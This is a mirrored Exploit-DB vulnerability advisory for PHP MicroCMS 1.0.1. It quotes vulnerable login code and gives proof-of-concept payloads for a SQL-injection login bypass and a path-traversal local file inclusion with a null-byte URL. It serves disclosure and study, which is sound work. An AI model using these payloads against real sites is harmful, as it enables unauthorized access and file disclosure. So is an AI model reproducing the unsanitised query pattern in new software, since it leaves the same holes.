bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/15011.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

79 lines
No EOL
2.6 KiB
Text
Raw Blame History

'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _ <
| | | | |__| / ____ \ |__| | |_) |
|_| |_|\____/_/ \_\____/|____/
http://www.exploit-db.com/moaub-15-php-microcms-1-0-1-multiple-remote-vulnerabilities/
'''
Title : PHP MicroCMS 1.0.1 Multiple Remote Vulnerabilities
Affected Version : PHP MicroCMS <= 1.0.1
Vendor Site : www.apphp.com/php-microcms/index.php
Discovery : abysssec.com
Description :
This CMS have many critical vulnerability that we refere to some of those here:
Vulnerabilites :
1. Authentication bypass with SQL Injection in login page:
user_name and password parameters recived from the login form are passed to do_login function:
login.php
line 12-17:
function Login() {
$this->wrong_login = false;
if (!$this->is_logged_in() && $_POST['submit'] == "Login" && !empty($_POST['user_name']) && !empty($_POST['password'])) $this->do_login($_POST['user_name'], $_POST['password']);
else if ($_POST['submit_logout'] == "Logout") $this->do_logout();
$this->accounts = new Profiles($GLOBALS['user_session']->get_session_variable("session_account_id"));
}
in do_login function these parameters are passed to get_account_information function:
login.php line 19-29:
function do_login($user_name, $password, $do_redirect = true) {
if ($account_information = $this->get_account_information($user_name, $password)) {
$this->set_session_variables($account_information);
if ($do_redirect) {
header("Location: index.php\r\n\r\n");
exit;
}
}else{
$this->wrong_login = true;
}
}
then these parameters without any validation are applied in SQL query directly:
login.php line 48-55:
function get_account_information($user_name, $password) {
$sql = "SELECT ".DB_PREFIX."accounts.*, user_name AS account_name
FROM ".DB_PREFIX."accounts
WHERE
user_name = '" . $user_name . "' AND // vulnerability here
password = AES_ENCRYPT('" . $password . "', '" . DB_ENCRYPT_KEY . "')"; // vulnerability here
return database_query($sql, DATA_ONLY, FIRST_ROW_ONLY);
}
POC:
in login page enter:
username: a' or '1'='1
password: a' or '1'='1
----------------------------------------------------------------------------------------------------
2. Local File Inclusion:
index.php file line 21:
$page = !empty($_GET['page']) ? $_GET['page'] : "home";
index.php file line 104,105:
if (($page != "") && file_exists("page/" . $page . ".php")) {
require("page/" . $page . ".php");
poc:
http://localhost/microcms/index.php?page=../include/base.inc.php%00
Reference in a new issue View git blame Copy permalink